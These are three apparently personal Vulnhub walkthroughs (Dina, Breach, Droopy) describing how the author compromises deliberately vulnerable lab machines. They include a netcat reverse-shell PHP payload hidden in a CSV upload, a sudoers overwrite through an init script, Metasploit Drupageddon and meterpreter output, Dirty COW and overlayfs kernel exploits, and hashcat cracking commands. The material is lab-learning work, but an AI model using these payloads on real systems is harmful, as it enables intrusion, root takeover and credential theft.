Dina 1.0 Walkthrough – Vulnhub

Another great vulnhub virtual machine for beginners – especially for me :). It was fun to test this machine –  so thank you Touhid!

Information Gathering

I used nmap and nikto to gather some information.

Nikto results:

+ Target IP:
+ Target Hostname: dina.lan
+ Target Port: 80
+ Using Encoding: Random URI encoding (non-UTF8)
+ Start Time: 2017-10-18 18:39:12 (GMT2)
+ Server: Apache/2.2.22 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /, inode: 425463, size: 3618, mtime: Tue Oct 17 15:46:52 2017
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ OSVDB-3268: /secure/: Directory indexing found.
+ OSVDB-3268: /secure/: Directory indexing found.
+ OSVDB-3268: /tmp/: Directory indexing found.
+ OSVDB-3092: /tmp/: This might be interesting...
+ 7444 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time: 2017-10-18 18:39:39 (GMT2) (27 seconds)

Nmap result:

80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 5 disallowed entries
|_/ange1 /angel1 /nothing /tmp /uploads
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Dina

I have checked all paths above and found some interesting strings on /nothing. Found the following strings in the comment of the source code:

#my secret pass

It looks like we found some passwords. Nice. Let’s check the other path: /secure. It contains a passwords protected backup.zip file. So I tried the passwords above and successfully unpacked it with the password freedom.

I am not toooo smart in computer .......dat the resoan i always choose easy password...with creds backup file....
uname: touhid
password: ******
url : /SecreTSMSgatwayLogin

Ok check that secret SMS Gateway. Tried to login with the username touhid and with the passwords found earlier. The login pair was touhid:diana.

The first thing what I usually do when identify a web application is check exploit-db for available exploits.

PlaySMS 1.4 - 'import.php' Remote Code Execution | php/webapps/42044.txt
PlaySMS 1.4 - 'sendfromfile.php' Remote Code Execution / Unrestricted File Upload | php/webapps/42003.txt
PlaySMS 1.4 - Remote Code Execution | php/webapps/42038.txt
PlaySms 0.7 - SQL Injection | linux/remote/404.pl
PlaySms 0.8 - 'index.php' Cross-Site Scripting | php/webapps/26871.txt
PlaySms 0.9.3 - Multiple Local/Remote File Inclusions | php/webapps/7687.txt
PlaySms - Remote File Inclusion | php/webapps/17792.txt
PlaySms - Cross-Site Request Forgery | php/webapps/30177.txt

This is all what I need. Touhid did a great job on finding the vulnerabilities in this application. At least 3 different kind of ways to run system commands through php system() function.

All right it’s time to get a remote shell.

Gaining remote shell

I tried to run system commands as described in 42044.txt. I was trying a lot, simply nc host port -e /bin/bash didn’t worked because this netcat was an openbsd version and “-e” option is missing from the openbsd version. A few minutes research and I had created a csv file with the following content:

<?php $cmd='rm -f /tmp/f; mkfifo /tmp/f && cat /tmp/f | /bin/sh -i 2>&1 | nc 7777 > /tmp/f 2>&1';system($cmd); ?>,2,3

Luckily I got shell!!!

Privilege escalation

Running whoami told me that my current user is www-data. Okay, check the system. Running netstat -tlpn, a mysql server is running on this machine. In the SecreTSMSgatwayLogin directory was a config.php file. I checked this file and found the login and password pair for the database.


Then selected the playsms database and found the user table, and the password hashes:

mysql hashes:

| admin_78f3198ce97ae2bdddb15cc25d559c6f |
| touhid_3a23bb515e06d0e944ff916e79a7775c

The findmyhash command didn’t find the password in the public database. I was too lazy to fire up oclhashcat and brute-force the hash, so moved on.

I cannot get higher privileges through mysql system command so I wanted another way to get root access.

cat /etc/*-release:


Okay let’s invite our dirty friend….


I am too lazy….Really… At this point I knew what to use…. I’ve got a little experience from earlier vulnhub machines and used the following exploit from exploit-db to enumerate privileges:40839.c
I was lucky, gcc was present on that machine and the exploit compiled without errors.

./exploit 1234

After a few minutes the root user firefart was created with the password 1234. Okay, check the root directory for the flag.

firefart@Dina:/# cat /root/flag.txt
cat /root/flag.txt
________ _________
\________\--------___ ___ ____----------/_________/
\_______\----\\\\\\ //_ _ \\ //////-------/________/
\______\----\\|| (( ~|~ ))) ||//------/________/
\_____\---\\ ((\ = / ))) //----/_____/
\____\--\_))) \ _)))---/____/
\__/ ((( (((_/
| -))) - ))

root password is : hello@3210
easy one …..but hard to guess…..
but i think u dont need root password……
u already have root shelll….

FLAG : 22d06624cd604a0626eb5a2992a6f2e6

Thank you Touhid M.Shaikh for the fun. It was a pleasure to play with this machine.


Vulnhub – Breach 1.0 walkthrough

First let’s see what we got. I did a basic nmap scan:


It seems that an active IPS/IDS is present. I tried different nmap evasion techniques but those didn’t work, it said that all ports are filtered. I checked manually if port 80 is open or not than  I fired up Nikto, nothing interesting.


Let’s watch those images. Voila, a little hint:


Okay, check that source code. Found an interesting line:

<!------Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo ----->

It looks like a hash or encoded string. I don’t know why, my first thought was that it is a base64 encoded string. I had to decode the string twice, and that gave me a username:password pair.


Did some investigation and found a CMS portal called IMPRESSCMS (clicked on Employee portal on initech.html). Let’s see if we can log in with our username/password pair. Login successful, nice. We have 3 messages in Inbox. Lets see the first:


I downloaded the keyfile located at the root of the website, and found out that this is a java keystore file. Read the 2 other messages but those didn’t help me too much. My first thought was proved itself, an active IDS/IPS is present. I searched for exploits related to impresscms but the one that could work were being trolled:


At this point I got stucked a bit. Tried dirbuster, different exploits, XSS vulnerabilities on CMS site but nothing. Tried to brute force the admin account, but no luck. Investigated the other pictures and sites deeper, nothing interesting. One option left on CMS site, check pgibbons profile. I found something interesting:

Published by Peter Gibbons on 2016/6/4 21:37:05. (0 reads)
Team – I have uploaded a pcap file of our red team’s re-production of the attack. I am not sure what trickery they were using but I cannot read the file. I tried every nmap switch from my C|EH studies and just cannot figure it out. They told me the alias, storepassword and keypassword are all set to ‘tomcat’. Is that useful?? Does anyone know what this is? I guess we are securely encrypted now? -Peter p.s. I’m going fishing for the next 2 days and will not have access to email or phone.

Opened the pcap file, it contained data but I didn’t have a private rsa key to decrypt. WAIT! I have one! I had to export the RSA private key from .keyfile and then I was able to look what the heck happened:


Tomcat Manager running at port 8443 ( | login successful with wireshark credentials). What more the wireshark capture gave us a hint that we can run shell commands with the help of cmd.jsp. But where it is? It has been uploaded but the resource cannot be found,  the author or a system service may deleted it. A little  googling helped me at this part. I can upload any kind of war files and there is a cmd.war file on the internet (Laudanum) that seems to be the same. So I uploaded it, searched for netcat and made a reverse shell back to my kali box.



First I tried to exploit some Ubuntu 14.04 based kernel exploits but all of them failed. Finally gave up probing exploits, instead I sent LinEnum priv checker to the victim machine and did a quick investigation what permissions do I have.

MySQL login was successful without password with username root. Nice. I found Milton’s username and password hash in the database then tried to crack the password with oclHashcat. It was successfully recovered, I tried to change my user from tomcat to milton. It was successful. Another username and password was found but I can’t crack this hash within a reasonable time.


After that changing user from tomcat to milton find a “some_script.sh” file with following content: Nothing here.

Okay dig deeper. Really. Nothing in here…. After some time I found an init script in init.d folder(portly.sh). This little script redirect all traffic to portly scanner. Okay I will use this script to add milton into sudoers group at system startup.

echo “echo “milton ALL=(ALL) ALL” > /etc/sudoers” > /etc/init.d/portly.sh

After system reboot I rebuild my connections, did a quick sudo su with milton and voila, I captured the flag.


Vulnhub – Droopy: v0.2


This is a quick post about how to hack this vulnerable virtual machine found in Vulnhub website. Just to be clear I am not a security professional, I am just learning and preparing myself to OCSP exam. If you found any mistake please let me know.


First we do some network discovery with netdiscover:


We see that host is at Let’s do nmap scan:

nmap -sS -A -O -vv -Pn > nmap.txt

80/tcp open http syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: B6341DFC213100C61DB4FB8775878CEC
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 36 disallowed entries
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
| /LICENSE.txt /MAINTAINERS.txt /update.php /UPGRADE.txt /xmlrpc.php
| /admin/ /comment/reply/ /filter/tips/ /node/add/ /search/
| /user/register/ /user/password/ /user/login/ /user/logout/ /?q=admin/
| /?q=comment/reply/ /?q=filter/tips/ /?q=node/add/ /?q=search/
|_/?q=user/password/ /?q=user/register/ /?q=user/login/ /?q=user/logout/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Welcome to La fraude fiscale des grandes soci\xC3\xA9t\xC3\xA9s | La fraud…
MAC Address: 00:0C:29:4A:B9:32 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 – 4.0

NMAP shows in this machine there is a website hosted by Apache webserver and Drupal is running on it. I’ve investigated the site and it requires login and password. Fire up Metasploit Framework and let’s do a quick check, find an exploit suitable to our victim. Because Drupal uses MySQL database its quite trivial that a SQL injection could work.


I choosed the third one and fingers crossed. Boom, we have a meterpreter connection.

msf > use exploit/multi/http/drupal_drupageddon
msf exploit(drupal_drupageddon) > options

Module options (exploit/multi/http/drupal_drupageddon):

Name Current Setting Required Description
—- ————— ——– ———–
Proxies no A proxy chain of format type:host:port[,type:host:port][…]
RHOST yes The target address
RPORT 80 yes The target port
TARGETURI / yes The target URI of the Drupal installation
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description
—- ————— ——– ———–
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:

Id Name
— —-
0 Drupal 7.0 – 7.31
msf exploit(drupal_drupageddon) > exploit

[*] Started reverse TCP handler on
[*] – Testing page
[*] – Creating new user SsozXsiTZb:UldknxsZnY
[*] – Logging in as SsozXsiTZb:UldknxsZnY
[*] – Trying to parse enabled modules
[*] – Enabling the PHP filter module
[*] – Setting permissions for PHP filter module
[*] – Getting tokens from create new article page
[*] – Calling preview page. Exploit should trigger…
[*] Sending stage (33068 bytes) to
[*] Meterpreter session 9 opened ( -> at 2016-04-19 11:06:36 +0200

meterpreter >

Nice news, let’s lurk around and get informations out of the system. I used sysinfo command and let’s see what is it.

meterpreter > sysinfo
Computer : droopy
OS : Linux droopy 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64
Meterpreter : php/php
meterpreter >

So this is an Ubuntu machine with an old kernel. I am trying my luck and check  if this machine is vulnerable to overlayfs vulnerability or not, what user persmissions I have, am I able to compile my exploit with gcc and run it.

First transfer the exploit to /tmp folder with meterpreter’s upload command and try to execute it:

meterpreter > getuid
Server username: www-data (33)
meterpreter > upload /root/Downloads/37292.c /tmp
[*] uploading : /root/Downloads/37292.c -> /tmp
[*] uploaded : /root/Downloads/37292.c -> /tmp/37292.c
meterpreter > shell
Process 1256 created.
Channel 1 created.
cd /tmp
gcc 37292.c -o exploit
chmod +x exploit
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
sh: 0: can’t access tty; job control turned off
# whoami

Nice, we have root access to the system, let’s find the flag. Usually flag takes place in the root directory, so let’s see what we have.


Dave.tc? Wut? After googling a bit I found that .tc extension could be a TrueCrypt password protected file. Google says that TrueCrypt are discontinued and password protected volumes can be hacked with proper program and with a good dictionary. My first thought was OclHashcat because I have an AMD card, and truecracker in Kali Linux supports Nvidia card (only?). I didn’t do research if it supports AMD too, because I am happy with OclHashcat. When I downloaded this vulnerable machine I saw two hints:

1.) Grab a copy of the rockyou wordlist.

2.) It’s fun to read other people’s email.

Okay, I have rockyou wordlist so check /var/mail:


Okay, let’s rock:

oclHashcat64.exe -a 0 -m 6211 -p : –session=all -o “D:\Penetration\HASHGPUCRACK\dave_found.txt” –outfile-format=3 -w 3 –gpu-temp-disable “C:\Users\media\Desktop\dave.tc” “D:\Penetration\wordlist\rockyou.txt”

Exhausted. Nothing. At this point several hours later still nothing. I tried to apply rules (best64), different dictionaries, nothing. The last sentence also could give a hint, I did a dictionary combinaton attack ( downloaded lyrics from The Jam, did a dictionary from this and combinated with rockyou). Still no luck. Will I fail at this point? This was so easy until this point. TRY HARDER! So I did a break and when I sit front of my computer again I had clue. What if I am trying with wrong hashing algorithm? Some guys on hashcat forums mentioned that should try SHA512 algorithm instead of RipeMD160. Okay, fire up OclHashcat again.

oclHashcat64.exe -a 0 -m 6221 -p : –session=all -o “D:\Penetration\HASHGPUCRACK\dave_found.txt” –outfile-format=3 -w 3 –gpu-temp-disable “C:\Users\media\Desktop\dave.tc” “D:\Penetration\wordlist\rockyou.txt”

After a couple of minutes it finished. Cracked. Okay, lets install TrueCrypt and check what we got. When it prompt for password I tried Copy/Paste and….. Wrong password. OMG what happening? Again CTRL+C CTRL+V, still no luck. Could it be possible? What if I type the password instead of copy/paste? Yes, it was my fault. It shows the drive, mounted to drive H:


Check out this drive. Nothing interesting, some jpg files and a .secret folder. HMMM!

I opened this one and under the .top folder I captured the flag.


This was quite fun! Thank you!